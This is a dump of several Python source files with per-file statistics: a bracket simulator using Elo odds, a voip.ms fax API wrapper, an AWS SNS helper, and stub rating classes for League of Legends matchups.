| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
dc3af614f4907fadf920f8ffb552253219621b05
| 41
|
py
|
Python
|
utils/dpbench_python/dbscan/__init__.py
|
geexie/dpbench
|
7d41409ded3c816f35003bc5aea071852bceb892
|
[
"BSD-2-Clause"
] | 8
|
2021-03-26T15:17:58.000Z
|
2022-01-21T21:56:19.000Z
|
utils/dpbench_python/dbscan/__init__.py
|
geexie/dpbench
|
7d41409ded3c816f35003bc5aea071852bceb892
|
[
"BSD-2-Clause"
] | 22
|
2021-03-30T21:20:57.000Z
|
2022-02-22T13:42:17.000Z
|
utils/dpbench_python/dbscan/__init__.py
|
geexie/dpbench
|
7d41409ded3c816f35003bc5aea071852bceb892
|
[
"BSD-2-Clause"
] | 7
|
2021-03-23T11:00:43.000Z
|
2022-02-02T12:28:55.000Z
|
from .dbscan_python import dbscan_python
| 20.5
| 40
| 0.878049
| 6
| 41
| 5.666667
| 0.666667
| 0.705882
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.097561
| 41
| 1
| 41
| 41
| 0.918919
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 1
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
dc43d8b25f10994b6ffa3ff6aafc73d85725f96a
| 91
|
py
|
Python
|
aws/sns.py
|
nathants/cli-aws
|
4e1b12099ede0afe016f8d7b655f05cb9d5c1251
|
[
"MIT"
] | 2
|
2019-10-25T19:39:55.000Z
|
2022-02-03T01:15:02.000Z
|
aws/sns.py
|
nathants/cli-aws
|
4e1b12099ede0afe016f8d7b655f05cb9d5c1251
|
[
"MIT"
] | null | null | null |
aws/sns.py
|
nathants/cli-aws
|
4e1b12099ede0afe016f8d7b655f05cb9d5c1251
|
[
"MIT"
] | null | null | null |
import aws
def arn(name):
    """Build the SNS topic ARN for *name* in the current region/account."""
    region = aws.region()
    account = aws.account()
    return 'arn:aws:sns:{}:{}:{}'.format(region, account, name)
| 18.2
| 63
| 0.637363
| 15
| 91
| 3.866667
| 0.666667
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.120879
| 91
| 4
| 64
| 22.75
| 0.725
| 0
| 0
| 0
| 0
| 0
| 0.538462
| 0.538462
| 0
| 0
| 0
| 0
| 0
| 1
| 0.333333
| false
| 0
| 0.333333
| 0.333333
| 1
| 0
| 1
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 1
| 1
| 0
|
0
| 7
|
dc67c16a9675c8484cb1c2a6c52dec2a93aad3af
| 5,319
|
py
|
Python
|
pybracket/basicBrackets.py
|
tennis-aa/tennis-bracket
|
02133ac98979ced7b8f47eeaa89ed1817cc0d802
|
[
"MIT"
] | null | null | null |
pybracket/basicBrackets.py
|
tennis-aa/tennis-bracket
|
02133ac98979ced7b8f47eeaa89ed1817cc0d802
|
[
"MIT"
] | null | null | null |
pybracket/basicBrackets.py
|
tennis-aa/tennis-bracket
|
02133ac98979ced7b8f47eeaa89ed1817cc0d802
|
[
"MIT"
] | null | null | null |
from random import random
import math
def generateMonkeys(players,n):
    """Generate *n* uniformly random bracket picks ("monkeys").

    Args:
        players: seeded entry list; length must be a power of two.
            The literal entry "Bye" marks an automatic advance.
        n: number of random brackets to generate.

    Returns:
        dict mapping "monkey0".."monkey{n-1}" to a flat list of the
        winner picked for every match, round by round.

    Raises:
        ValueError: if len(players) is not a power of two.
    """
    # helper variables
    bracketSize = len(players)
    # Exact power-of-two check. The previous math.log(bracketSize, 2)
    # .is_integer() test is float-based (log(x)/log(2)) and can report a
    # non-integer for large exact powers of two.
    if bracketSize < 1 or bracketSize & (bracketSize - 1):
        raise ValueError("bracketSize has to be 2^n")
    rounds = bracketSize.bit_length() - 1
    # counter[j] = index into `bracket` where round j's results start
    counter = [0]*(rounds+1)
    for j in range(rounds):
        counter[j+1] = counter[j] + int(bracketSize/(2**j))
    # generate random brackets
    monkeys = {}
    for k in range(n):
        bracket = []
        # round 1: pick from the seeded player list ("Bye" auto-advances)
        for i in range(int(bracketSize/2)):
            if players[2*i]=="Bye":
                bracket.append(players[2*i+1])
            elif players[2*i+1]=="Bye":
                bracket.append(players[2*i])
            elif random() < 0.5:
                bracket.append(players[2*i])
            else:
                bracket.append(players[2*i+1])
        # later rounds: pick between the two winners of the previous round
        for j in range(1,rounds):
            for i in range(int(bracketSize/(2**(j+1)))):
                if random()<0.5:
                    bracket.append(bracket[counter[j]-bracketSize+2*i])
                else:
                    bracket.append(bracket[counter[j]-bracketSize+2*i+1])
        monkeys["monkey"+str(k)] = bracket
    return monkeys
def generateBots(players, elo, n, sets=3):
    """Generate n bracket predictions sampled from Elo win probabilities ("bots").

    :param players: first-round entrants in bracket order; length must be a
        power of two. "Bye" entries are free wins for the paired player.
    :param elo: Elo rating of each entry in ``players`` (same order).
    :param n: number of brackets to generate.
    :param sets: 3 (default) or 5; for best-of-5 the per-match win probability
        is adjusted through fiveodds().
    :returns: dict mapping "bot0".."bot{n-1}" to a flat list of winners, round
        by round.
    :raises ValueError: if len(players) is not a power of two.
    """
    # helper variables
    bracketSize = len(players)
    rounds = math.log(bracketSize, 2)
    if not rounds.is_integer():
        raise ValueError("bracketSize has to be 2^n")
    rounds = int(rounds)
    # counter[j] - bracketSize is the offset in `bracket` where the winners
    # produced by round j start
    counter = [0] * (rounds + 1)
    for j in range(rounds):
        counter[j + 1] = counter[j] + bracketSize // (2 ** j)
    # generate brackets based on probabilities from elo
    bots = {}
    for k in range(n):
        bracket = []
        bracket_elo = []
        # first round: byes advance automatically, otherwise sample the winner
        # from the standard Elo expected-score formula
        for i in range(bracketSize // 2):
            if players[2 * i] == "Bye":
                bracket.append(players[2 * i + 1])
                bracket_elo.append(elo[2 * i + 1])
                continue
            if players[2 * i + 1] == "Bye":
                bracket.append(players[2 * i])
                bracket_elo.append(elo[2 * i])
                continue
            Q1 = 10 ** (elo[2 * i] / 400)
            Q2 = 10 ** (elo[2 * i + 1] / 400)
            probability = Q1 / (Q1 + Q2)
            if sets == 5:
                probability = fiveodds(probability)
            if random() < probability:
                bracket.append(players[2 * i])
                bracket_elo.append(elo[2 * i])
            else:
                bracket.append(players[2 * i + 1])
                bracket_elo.append(elo[2 * i + 1])
        # later rounds: sample between the two winners of the previous round
        for j in range(1, rounds):
            for i in range(bracketSize // (2 ** (j + 1))):
                base = counter[j] - bracketSize + 2 * i
                Q1 = 10 ** (bracket_elo[base] / 400)
                Q2 = 10 ** (bracket_elo[base + 1] / 400)
                probability = Q1 / (Q1 + Q2)
                if sets == 5:
                    probability = fiveodds(probability)
                winner = base if random() < probability else base + 1
                bracket.append(bracket[winner])
                bracket_elo.append(bracket_elo[winner])
        bots["bot" + str(k)] = bracket
    return bots
def generateElo(players, elo):
    """Generate the deterministic bracket where the higher-rated player wins.

    :param players: first-round entrants in bracket order; length must be a
        power of two. "Bye" entries are free wins for the paired player.
    :param elo: Elo rating of each entry in ``players`` (same order).
    :returns: dict with the single key "Elo" mapping to the flat list of
        winners, round by round.
    :raises ValueError: if len(players) is not a power of two.
    """
    # helper variables
    bracketSize = len(players)
    rounds = math.log(bracketSize, 2)
    if not rounds.is_integer():
        raise ValueError("bracketSize has to be 2^n")
    rounds = int(rounds)
    # counter[j] - bracketSize is the offset in `bracket` where the winners
    # produced by round j start
    counter = [0] * (rounds + 1)
    for j in range(rounds):
        counter[j + 1] = counter[j] + bracketSize // (2 ** j)
    bracket = []
    bracket_elo = []
    # first round: byes advance automatically, otherwise higher Elo wins
    # (ties go to the second player of the pair)
    for i in range(bracketSize // 2):
        if players[2 * i] == "Bye":
            bracket.append(players[2 * i + 1])
            bracket_elo.append(elo[2 * i + 1])
            continue
        if players[2 * i + 1] == "Bye":
            bracket.append(players[2 * i])
            bracket_elo.append(elo[2 * i])
            continue
        if elo[2 * i] > elo[2 * i + 1]:
            bracket.append(players[2 * i])
            bracket_elo.append(elo[2 * i])
        else:
            bracket.append(players[2 * i + 1])
            bracket_elo.append(elo[2 * i + 1])
    # later rounds: higher Elo of the two previous winners advances
    for j in range(1, rounds):
        for i in range(bracketSize // (2 ** (j + 1))):
            base = counter[j] - bracketSize + 2 * i
            winner = base if bracket_elo[base] > bracket_elo[base + 1] else base + 1
            bracket.append(bracket[winner])
            bracket_elo.append(bracket_elo[winner])
    return {"Elo": bracket}
# The following function computes the probability of winning a 5 set match given the probability of winning a 3 set match.
# The elo ratings used in this package are for 3 set matches. A conversion is necessary for 5 set matches.
# This function was taken from https://github.com/JeffSackmann/tennis_misc/blob/master/fiveSetProb.py
import numpy
def fiveodds(p3):
    """Convert a best-of-3 win probability into a best-of-5 win probability.

    Recovers the single-set win probability p1 by solving
    3*p1**2 - 2*p1**3 = p3 (via numpy.roots, taking the same root index as
    the original Sackmann implementation), then returns the probability of
    winning at least three of five sets.
    """
    set_prob = numpy.roots([-2, 3, 0, -1 * p3])[1]
    best_of_five = (set_prob ** 3) * (4 - 3 * set_prob + (6 * (1 - set_prob) * (1 - set_prob)))
    return best_of_five
| 35.46
| 122
| 0.550291
| 704
| 5,319
| 4.120739
| 0.142045
| 0.030334
| 0.022751
| 0.096518
| 0.814547
| 0.779731
| 0.769045
| 0.758359
| 0.718373
| 0.709411
| 0
| 0.04292
| 0.312277
| 5,319
| 150
| 123
| 35.46
| 0.750137
| 0.094191
| 0
| 0.77686
| 1
| 0
| 0.021834
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.033058
| false
| 0
| 0.024793
| 0
| 0.090909
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
dcae86607b952b08c89fc14669ca4312acc97738
| 15,720
|
py
|
Python
|
voipms/entities/faxset.py
|
4doom4/python-voipms
|
3159ccfaf1ed9f5fef431fa3d2fdd54b9d3b1b3c
|
[
"MIT"
] | 14
|
2017-06-26T16:22:59.000Z
|
2022-03-10T13:22:49.000Z
|
voipms/entities/faxset.py
|
judahpaul16/python-voipms
|
4e1eb51f927b9e0924091f7bbf25ccc2193c3bac
|
[
"MIT"
] | 8
|
2018-02-15T18:25:48.000Z
|
2022-03-29T06:17:00.000Z
|
voipms/entities/faxset.py
|
judahpaul16/python-voipms
|
4e1eb51f927b9e0924091f7bbf25ccc2193c3bac
|
[
"MIT"
] | 8
|
2019-02-22T00:42:25.000Z
|
2022-02-14T19:50:41.000Z
|
# coding=utf-8
"""
The Fax API endpoint set
Documentation: https://voip.ms/m/apidocs.php
"""
from voipms.baseapi import BaseApi
from voipms.helpers import convert_bool, validate_email
class FaxSet(BaseApi):
    """
    Set for the Fax endpoint.

    Each public method maps to one "set*" call of the voip.ms API: it
    validates its inputs, assembles the request parameters and performs the
    request through the shared client.
    """
    def __init__(self, *args, **kwargs):
        """
        Initialize the endpoint
        """
        super(FaxSet, self).__init__(*args, **kwargs)
        self.endpoint = 'fax'

    @staticmethod
    def _reject_unknown_parameters(kwargs):
        """Raise a ValueError listing any keyword arguments left unconsumed."""
        if len(kwargs) > 0:
            not_allowed_parameters = ""
            for key, value in kwargs.items():
                not_allowed_parameters += key + " "
            raise ValueError("Parameters not allowed: {}".format(not_allowed_parameters))

    def fax_folder(self, name, **kwargs):
        """
        Create or update the information of a specific Fax Folder

        :param name: [Required] Name of the Fax Folder to create or update (Example: FAMILY)
        :type name: :py:class:`str`
        :param fax_id: ID of the Fax Folder to edit (Values from fax.get_fax_folders)
        :type fax_id: :py:class:`int`
        :param test: Set to true if testing how cancel a Fax Folder (True/False)
        :type test: :py:class:`bool`

        :returns: :py:class:`dict`
        """
        method = "setFaxFolder"

        if not isinstance(name, str):
            raise ValueError("Name of the Fax Folder to create or update needs to be a str (Example: FAMILY)")

        parameters = {
            "name": name,
        }

        if "fax_id" in kwargs:
            if not isinstance(kwargs["fax_id"], int):
                raise ValueError("ID of the Fax Folder to edit needs to be an int (Values from fax.get_fax_folders)")
            parameters["id"] = kwargs.pop("fax_id")

        if "test" in kwargs:
            if not isinstance(kwargs["test"], bool):
                raise ValueError("Set to true if testing how cancel a Fax Folder needs to be a bool (True/False)")
            parameters["test"] = convert_bool(kwargs.pop("test"))

        self._reject_unknown_parameters(kwargs)

        return self._voipms_client._get(method, parameters)

    def email_to_fax(self, auth_email, from_number_id, security_code, **kwargs):
        """
        Create or update the information of a specific "Email to Fax configuration"

        :param auth_email: [Required] Email address from you will sent Fax Messages
        :type auth_email: :py:class:`str`
        :param from_number_id: [Required] Fax number that will appear as fax sender. (values from fax.get_fax_numbers_info)
        :type from_number_id: :py:class:`int`
        :param security_code: [Required] An alphanumeric code to identify your emails before send as Fax
        :type security_code: :py:class:`str`
        :param fax_id: ID of the "Email to Fax" to edit (Values from fax.get_email_to_fax)
        :type fax_id: :py:class:`int`
        :param enabled: If Enable, we will send Fax Message when we receive an email from the provided address (True/False)
        :type enabled: :py:class:`bool`
        :param security_code_enabled: If Enable, we will check the mail subject if this include a Security Code before send the Fax (True/False)
        :type security_code_enabled: :py:class:`bool`
        :param test: Set to true if testing how cancel a Fax Folder (True/False)
        :type test: :py:class:`bool`

        :returns: :py:class:`dict`
        """
        method = "setEmailToFax"

        if not isinstance(auth_email, str):
            raise ValueError("Email address from you will sent Fax Messages needs to be a str")
        elif not validate_email(auth_email):
            raise ValueError("Email address from you will sent Fax Messages is not a correct email syntax")

        if not isinstance(from_number_id, int):
            raise ValueError("Fax number that will appear as fax sender needs to be an int (values from fax.get_fax_numbers_info)")

        if not isinstance(security_code, str):
            raise ValueError("An alphanumeric code to identify your emails before send as Fax needs to be a str")

        parameters = {
            "auth_email": auth_email,
            "from_number_id": from_number_id,
            "security_code": security_code,
        }

        if "fax_id" in kwargs:
            if not isinstance(kwargs["fax_id"], int):
                raise ValueError("ID of the \"Email to Fax\" to edit (Values from fax.get_fax_folders)")
            parameters["id"] = kwargs.pop("fax_id")

        if "enabled" in kwargs:
            if not isinstance(kwargs["enabled"], bool):
                raise ValueError("If Enable, we will send Fax Message when we receive an email from the provided address needs to be a bool (True/False)")
            parameters["enabled"] = convert_bool(kwargs.pop("enabled"))

        if "security_code_enabled" in kwargs:
            if not isinstance(kwargs["security_code_enabled"], bool):
                raise ValueError("If Enable, we will check the mail subject if this include a Security Code before send the Fax needs to be a bool (True/False)")
            parameters["security_code_enabled"] = convert_bool(kwargs.pop("security_code_enabled"))

        if "test" in kwargs:
            if not isinstance(kwargs["test"], bool):
                raise ValueError("Set to true if testing how cancel a Fax Folder needs to be a bool (True/False)")
            parameters["test"] = convert_bool(kwargs.pop("test"))

        self._reject_unknown_parameters(kwargs)

        return self._voipms_client._get(method, parameters)

    def fax_number_info(self, did, **kwargs):
        """
        Updates the information from a specific Fax Number

        :param did: [Required] DID Number to be ported into our network (Example: 5552341234)
        :type did: :py:class:`int`
        :param email: Email address where send notifications when receive Fax Messages (Example: yourname@company.com)
        :type email: :py:class:`str`
        :param email_enabled: Flag to enable the email notifications (True/False default False)
        :type email_enabled: :py:class:`bool`
        :param email_attach_file: Flag to enable attach the Fax Message as a PDF file in the notifications (True/False default False)
        :type email_attach_file: :py:class:`bool`
        :param url_callback: URL where make a POST when you receive a Fax Message
        :type url_callback: :py:class:`str`
        :param url_callback_enable: Flag to enable the URL Callback functionality (True/False default False)
        :type url_callback_enable: :py:class:`bool`
        :param url_callback_retry: Flag to enable retry the POST action in case we don't receive "ok" (True/False default False)
        :type url_callback_retry: :py:class:`bool`
        :param test: Set to true if testing how cancel a Fax Folder (True/False)
        :type test: :py:class:`bool`

        :returns: :py:class:`dict`
        """
        method = "setFaxNumberInfo"

        if not isinstance(did, int):
            raise ValueError("DID Number to be ported into our network needs to be an int (Example: 5552341234)")

        parameters = {
            "did": did,
        }

        if "email" in kwargs:
            email = kwargs.pop("email")
            if not isinstance(email, str):
                raise ValueError("Email address where send notifications when receive Fax Messages needs to be a str (Example: yourname@company.com)")
            elif not validate_email(email):
                raise ValueError("Email address where send notifications when receive Fax Messages is not a correct email syntax")
            parameters["email"] = email

        if "email_enabled" in kwargs:
            if not isinstance(kwargs["email_enabled"], bool):
                raise ValueError("Flag to enable the email notifications needs to be a bool (True/False default False)")
            parameters["email_enabled"] = convert_bool(kwargs.pop("email_enabled"))

        if "email_attach_file" in kwargs:
            if not isinstance(kwargs["email_attach_file"], bool):
                raise ValueError("Flag to enable attach the Fax Message as a PDF file in the notifications needs to be a bool (True/False default False)")
            parameters["email_attach_file"] = convert_bool(kwargs.pop("email_attach_file"))

        if "url_callback" in kwargs:
            if not isinstance(kwargs["url_callback"], str):
                raise ValueError("URL where make a POST when you receive a Fax Message needs to be a str")
            # Bug fix: the URL was previously passed through convert_bool();
            # it is a plain string and must be forwarded unchanged.
            parameters["url_callback"] = kwargs.pop("url_callback")

        if "url_callback_enable" in kwargs:
            if not isinstance(kwargs["url_callback_enable"], bool):
                raise ValueError("Flag to enable the URL Callback functionality needs to be a bool (True/False default False)")
            parameters["url_callback_enable"] = convert_bool(kwargs.pop("url_callback_enable"))

        if "url_callback_retry" in kwargs:
            if not isinstance(kwargs["url_callback_retry"], bool):
                raise ValueError("Flag to enable retry the POST action in case we don't receive \"ok\" (True/False default False)")
            parameters["url_callback_retry"] = convert_bool(kwargs.pop("url_callback_retry"))

        if "test" in kwargs:
            if not isinstance(kwargs["test"], bool):
                raise ValueError("Set to true if testing how cancel a Fax Folder needs to be a bool (True/False)")
            parameters["test"] = convert_bool(kwargs.pop("test"))

        self._reject_unknown_parameters(kwargs)

        return self._voipms_client._get(method, parameters)

    def fax_number_email(self, did, **kwargs):
        """
        Updates the email configuration from a specific Fax Number

        :param did: [Required] DID Number to be ported into our network (Example: 5552341234)
        :type did: :py:class:`int`
        :param email: Email address where send notifications when receive Fax Messages (Example: yourname@company.com)
        :type email: :py:class:`str`
        :param email_enabled: Flag to enable the email notifications (True/False default False)
        :type email_enabled: :py:class:`bool`
        :param email_attach_file: Flag to enable attach the Fax Message as a PDF file in the notifications (True/False default False)
        :type email_attach_file: :py:class:`bool`
        :param test: Set to true if testing how cancel a Fax Folder (True/False)
        :type test: :py:class:`bool`

        :returns: :py:class:`dict`
        """
        method = "setFaxNumberEmail"

        if not isinstance(did, int):
            raise ValueError("DID Number to be ported into our network needs to be an int (Example: 5552341234)")

        parameters = {
            "did": did,
        }

        if "email" in kwargs:
            email = kwargs.pop("email")
            if not isinstance(email, str):
                raise ValueError("Email address where send notifications when receive Fax Messages needs to be a str (Example: yourname@company.com)")
            elif not validate_email(email):
                raise ValueError("Email address where send notifications when receive Fax Messages is not a correct email syntax")
            parameters["email"] = email

        if "email_enabled" in kwargs:
            if not isinstance(kwargs["email_enabled"], bool):
                raise ValueError("Flag to enable the email notifications needs to be a bool (True/False default False)")
            parameters["email_enabled"] = convert_bool(kwargs.pop("email_enabled"))

        if "email_attach_file" in kwargs:
            if not isinstance(kwargs["email_attach_file"], bool):
                raise ValueError("Flag to enable attach the Fax Message as a PDF file in the notifications needs to be a bool (True/False default False)")
            parameters["email_attach_file"] = convert_bool(kwargs.pop("email_attach_file"))

        if "test" in kwargs:
            if not isinstance(kwargs["test"], bool):
                raise ValueError("Set to true if testing how cancel a Fax Folder needs to be a bool (True/False)")
            parameters["test"] = convert_bool(kwargs.pop("test"))

        self._reject_unknown_parameters(kwargs)

        return self._voipms_client._get(method, parameters)

    def fax_number_url_callback(self, did, **kwargs):
        """
        Updates the url callback configuration from a specific Fax Number

        :param did: [Required] DID Number to be ported into our network (Example: 5552341234)
        :type did: :py:class:`int`
        :param url_callback: URL where make a POST when you receive a Fax Message
        :type url_callback: :py:class:`str`
        :param url_callback_enable: Flag to enable the URL Callback functionality (True/False default False)
        :type url_callback_enable: :py:class:`bool`
        :param url_callback_retry: Flag to enable retry the POST action in case we don't receive "ok" (True/False default False)
        :type url_callback_retry: :py:class:`bool`
        :param test: Set to true if testing how cancel a Fax Folder (True/False)
        :type test: :py:class:`bool`

        :returns: :py:class:`dict`
        """
        method = "setFaxNumberURLCallback"

        if not isinstance(did, int):
            raise ValueError("DID Number to be ported into our network needs to be an int (Example: 5552341234)")

        parameters = {
            "did": did,
        }

        if "url_callback" in kwargs:
            if not isinstance(kwargs["url_callback"], str):
                raise ValueError("URL where make a POST when you receive a Fax Message needs to be a str")
            # Bug fix: the URL was previously passed through convert_bool();
            # it is a plain string and must be forwarded unchanged.
            parameters["url_callback"] = kwargs.pop("url_callback")

        if "url_callback_enable" in kwargs:
            if not isinstance(kwargs["url_callback_enable"], bool):
                raise ValueError("Flag to enable the URL Callback functionality needs to be a bool (True/False default False)")
            parameters["url_callback_enable"] = convert_bool(kwargs.pop("url_callback_enable"))

        if "url_callback_retry" in kwargs:
            if not isinstance(kwargs["url_callback_retry"], bool):
                raise ValueError("Flag to enable retry the POST action in case we don't receive \"ok\" (True/False default False)")
            parameters["url_callback_retry"] = convert_bool(kwargs.pop("url_callback_retry"))

        if "test" in kwargs:
            if not isinstance(kwargs["test"], bool):
                raise ValueError("Set to true if testing how cancel a Fax Folder needs to be a bool (True/False)")
            parameters["test"] = convert_bool(kwargs.pop("test"))

        self._reject_unknown_parameters(kwargs)

        return self._voipms_client._get(method, parameters)
| 47.636364
| 161
| 0.635878
| 2,063
| 15,720
| 4.727581
| 0.077072
| 0.04737
| 0.043064
| 0.020507
| 0.899621
| 0.870194
| 0.862914
| 0.83564
| 0.813698
| 0.799139
| 0
| 0.00576
| 0.27112
| 15,720
| 329
| 162
| 47.781155
| 0.845436
| 0.267557
| 0
| 0.744318
| 0
| 0.034091
| 0.358122
| 0.016015
| 0
| 0
| 0
| 0
| 0
| 1
| 0.034091
| false
| 0
| 0.011364
| 0
| 0.079545
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
dcb88ef95e1251ca0dd7d1d40d231be6efb26094
| 6,407
|
py
|
Python
|
loldib/getratings/models/NA/na_varus/na_varus_bot.py
|
koliupy/loldib
|
c9ab94deb07213cdc42b5a7c26467cdafaf81b7f
|
[
"Apache-2.0"
] | null | null | null |
loldib/getratings/models/NA/na_varus/na_varus_bot.py
|
koliupy/loldib
|
c9ab94deb07213cdc42b5a7c26467cdafaf81b7f
|
[
"Apache-2.0"
] | null | null | null |
loldib/getratings/models/NA/na_varus/na_varus_bot.py
|
koliupy/loldib
|
c9ab94deb07213cdc42b5a7c26467cdafaf81b7f
|
[
"Apache-2.0"
] | null | null | null |
from getratings.models.ratings import Ratings
# Registry of per-matchup rating models for Varus played bot lane in the NA
# region: one empty Ratings subclass per opposing champion. The classes add
# no behavior of their own; presumably the surrounding framework selects a
# model class by its (region, champion, lane, opponent) encoded name —
# TODO confirm against the getratings lookup code.
class NA_Varus_Bot_Aatrox(Ratings):
    pass
class NA_Varus_Bot_Ahri(Ratings):
    pass
class NA_Varus_Bot_Akali(Ratings):
    pass
class NA_Varus_Bot_Alistar(Ratings):
    pass
class NA_Varus_Bot_Amumu(Ratings):
    pass
class NA_Varus_Bot_Anivia(Ratings):
    pass
class NA_Varus_Bot_Annie(Ratings):
    pass
class NA_Varus_Bot_Ashe(Ratings):
    pass
class NA_Varus_Bot_AurelionSol(Ratings):
    pass
class NA_Varus_Bot_Azir(Ratings):
    pass
class NA_Varus_Bot_Bard(Ratings):
    pass
class NA_Varus_Bot_Blitzcrank(Ratings):
    pass
class NA_Varus_Bot_Brand(Ratings):
    pass
class NA_Varus_Bot_Braum(Ratings):
    pass
class NA_Varus_Bot_Caitlyn(Ratings):
    pass
class NA_Varus_Bot_Camille(Ratings):
    pass
class NA_Varus_Bot_Cassiopeia(Ratings):
    pass
class NA_Varus_Bot_Chogath(Ratings):
    pass
class NA_Varus_Bot_Corki(Ratings):
    pass
class NA_Varus_Bot_Darius(Ratings):
    pass
class NA_Varus_Bot_Diana(Ratings):
    pass
class NA_Varus_Bot_Draven(Ratings):
    pass
class NA_Varus_Bot_DrMundo(Ratings):
    pass
class NA_Varus_Bot_Ekko(Ratings):
    pass
class NA_Varus_Bot_Elise(Ratings):
    pass
class NA_Varus_Bot_Evelynn(Ratings):
    pass
class NA_Varus_Bot_Ezreal(Ratings):
    pass
class NA_Varus_Bot_Fiddlesticks(Ratings):
    pass
class NA_Varus_Bot_Fiora(Ratings):
    pass
class NA_Varus_Bot_Fizz(Ratings):
    pass
class NA_Varus_Bot_Galio(Ratings):
    pass
class NA_Varus_Bot_Gangplank(Ratings):
    pass
class NA_Varus_Bot_Garen(Ratings):
    pass
class NA_Varus_Bot_Gnar(Ratings):
    pass
class NA_Varus_Bot_Gragas(Ratings):
    pass
class NA_Varus_Bot_Graves(Ratings):
    pass
class NA_Varus_Bot_Hecarim(Ratings):
    pass
class NA_Varus_Bot_Heimerdinger(Ratings):
    pass
class NA_Varus_Bot_Illaoi(Ratings):
    pass
class NA_Varus_Bot_Irelia(Ratings):
    pass
class NA_Varus_Bot_Ivern(Ratings):
    pass
class NA_Varus_Bot_Janna(Ratings):
    pass
class NA_Varus_Bot_JarvanIV(Ratings):
    pass
class NA_Varus_Bot_Jax(Ratings):
    pass
class NA_Varus_Bot_Jayce(Ratings):
    pass
class NA_Varus_Bot_Jhin(Ratings):
    pass
class NA_Varus_Bot_Jinx(Ratings):
    pass
class NA_Varus_Bot_Kalista(Ratings):
    pass
class NA_Varus_Bot_Karma(Ratings):
    pass
class NA_Varus_Bot_Karthus(Ratings):
    pass
class NA_Varus_Bot_Kassadin(Ratings):
    pass
class NA_Varus_Bot_Katarina(Ratings):
    pass
class NA_Varus_Bot_Kayle(Ratings):
    pass
class NA_Varus_Bot_Kayn(Ratings):
    pass
class NA_Varus_Bot_Kennen(Ratings):
    pass
class NA_Varus_Bot_Khazix(Ratings):
    pass
class NA_Varus_Bot_Kindred(Ratings):
    pass
class NA_Varus_Bot_Kled(Ratings):
    pass
class NA_Varus_Bot_KogMaw(Ratings):
    pass
class NA_Varus_Bot_Leblanc(Ratings):
    pass
class NA_Varus_Bot_LeeSin(Ratings):
    pass
class NA_Varus_Bot_Leona(Ratings):
    pass
class NA_Varus_Bot_Lissandra(Ratings):
    pass
class NA_Varus_Bot_Lucian(Ratings):
    pass
class NA_Varus_Bot_Lulu(Ratings):
    pass
class NA_Varus_Bot_Lux(Ratings):
    pass
class NA_Varus_Bot_Malphite(Ratings):
    pass
class NA_Varus_Bot_Malzahar(Ratings):
    pass
class NA_Varus_Bot_Maokai(Ratings):
    pass
class NA_Varus_Bot_MasterYi(Ratings):
    pass
class NA_Varus_Bot_MissFortune(Ratings):
    pass
class NA_Varus_Bot_MonkeyKing(Ratings):
    pass
class NA_Varus_Bot_Mordekaiser(Ratings):
    pass
class NA_Varus_Bot_Morgana(Ratings):
    pass
class NA_Varus_Bot_Nami(Ratings):
    pass
class NA_Varus_Bot_Nasus(Ratings):
    pass
class NA_Varus_Bot_Nautilus(Ratings):
    pass
class NA_Varus_Bot_Nidalee(Ratings):
    pass
class NA_Varus_Bot_Nocturne(Ratings):
    pass
class NA_Varus_Bot_Nunu(Ratings):
    pass
class NA_Varus_Bot_Olaf(Ratings):
    pass
class NA_Varus_Bot_Orianna(Ratings):
    pass
class NA_Varus_Bot_Ornn(Ratings):
    pass
class NA_Varus_Bot_Pantheon(Ratings):
    pass
class NA_Varus_Bot_Poppy(Ratings):
    pass
class NA_Varus_Bot_Quinn(Ratings):
    pass
class NA_Varus_Bot_Rakan(Ratings):
    pass
class NA_Varus_Bot_Rammus(Ratings):
    pass
class NA_Varus_Bot_RekSai(Ratings):
    pass
class NA_Varus_Bot_Renekton(Ratings):
    pass
class NA_Varus_Bot_Rengar(Ratings):
    pass
class NA_Varus_Bot_Riven(Ratings):
    pass
class NA_Varus_Bot_Rumble(Ratings):
    pass
class NA_Varus_Bot_Ryze(Ratings):
    pass
class NA_Varus_Bot_Sejuani(Ratings):
    pass
class NA_Varus_Bot_Shaco(Ratings):
    pass
class NA_Varus_Bot_Shen(Ratings):
    pass
class NA_Varus_Bot_Shyvana(Ratings):
    pass
class NA_Varus_Bot_Singed(Ratings):
    pass
class NA_Varus_Bot_Sion(Ratings):
    pass
class NA_Varus_Bot_Sivir(Ratings):
    pass
class NA_Varus_Bot_Skarner(Ratings):
    pass
class NA_Varus_Bot_Sona(Ratings):
    pass
class NA_Varus_Bot_Soraka(Ratings):
    pass
class NA_Varus_Bot_Swain(Ratings):
    pass
class NA_Varus_Bot_Syndra(Ratings):
    pass
class NA_Varus_Bot_TahmKench(Ratings):
    pass
class NA_Varus_Bot_Taliyah(Ratings):
    pass
class NA_Varus_Bot_Talon(Ratings):
    pass
